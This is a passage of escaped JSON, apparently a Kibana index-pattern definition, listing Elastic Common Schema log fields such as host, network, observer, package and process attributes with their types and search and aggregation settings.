eyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.architecture\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.full\"}}},{\"count\":0,\"name\":\"host.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.name\"}}},{\"count\":0,\"name\":\"host.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.uptime\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.user.full_name\"}}},{\"count\":0,\"name\":\"host.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.user.name\"}}},{\"count\":0,\"name\":\"http.request.body.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.body.content\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.body.content.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"http.request.body.content\"}}},{\"count\":0,\"name\":\"http.request.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.method\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.referrer\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.body.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.body.content\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.body.content.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"http.response.body.content\"}}},{\"count\":0,\"name\":\"http.response.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.status_code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"interface.alias\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"interface.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"interface.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.level\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.logger\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.line\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.function\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"log.syslog.facility.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.facility.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.priority\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"network.application\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.community_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.direction\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.forwarded_ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.iana_number\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.inner.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.inner.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.protocol\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.transport\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.interface.alias\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.interface.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.interface.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.zone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.interface.alias\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.interface.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.interface.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.zone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"observer.os.full\"}}},{\"count\":0,\"name\":\"observer.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"observer.os.name\"}}},{\"count\":0,\"name\":\"observer.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.serial_number\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.vendor\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"organization.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"organization.name\"}}},{\"count\":0,\"name\":\"os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"os.full\"}}},{\"count\":0,\"name\":\"os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"os.name\"}}},{\"count\":0,\"name\":\"os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.architecture\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.build_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.checksum\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.install_scope\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.installed\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.license\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.size\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"package.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.args\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.args_count\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"